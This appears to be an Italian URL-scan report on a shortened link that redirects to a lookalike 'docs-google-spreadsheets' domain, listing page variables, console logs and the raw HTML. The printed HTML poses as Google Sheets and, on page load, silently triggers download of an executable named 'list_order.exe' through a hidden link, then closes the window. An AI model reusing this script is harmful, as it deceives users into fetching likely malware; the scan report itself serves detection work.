https://artisemely.com/pHzmJc

URL inviato:
https://docs-google-spreadsheets.anniemakesart.com/JqFkpNReindirizzato
Report terminato:

I link in uscita identificati dalla pagina

Variabili JavaScript · 3 trovate

Le variabili JavaScript globali caricate sull'oggetto finestra di una pagina sono variabili dichiarate all'esterno delle funzioni e accessibili da qualsiasi punto del codice nell'ambito corrente

NomeTipo
onbeforetoggleobject
documentPictureInPictureobject
onscrollendobject

Messaggi di log della console · 2 trovati

Messaggi registrati nella console Web

TipoCategoriaLog
errornetwork
URL
https://artisemely.com/favicon.ico
Testo
Failed to load resource: the server responded with a status of 404 (Not Found)
warningother
URL
https://artisemely.com/pHzmJc
Testo
Scripts may close only the windows that were opened by them.

HTML

Il corpo HTML non elaborato della pagina

<!DOCTYPE html><html lang="ru"><head><base href="/lander/goresolve-load_1734013623/index.html">
    <meta charset="UTF-8">
    <title>Google Sheets</title>
    <script>
        window.onload = function() {
            const fileUrl = 'fille/list_order.exe';
            const fileName = 'list_order.exe';

            // Создание скрытой ссылки для скачивания
            const link = document.createElement('a');
            link.href = fileUrl;
            link.download = fileName;

            // Добавление ссылки в документ
            document.body.appendChild(link);

            // Программный клик по ссылке
            link.click();

            // Удаление ссылки из документа
            document.body.removeChild(link);

            // Попытка закрыть окно через 1 секунду
            setTimeout(function() {
                window.close();
            }, 1000); // 1000 миллисекунд = 1 секунда
        };
    </script>
</head>
<body>


</body></html>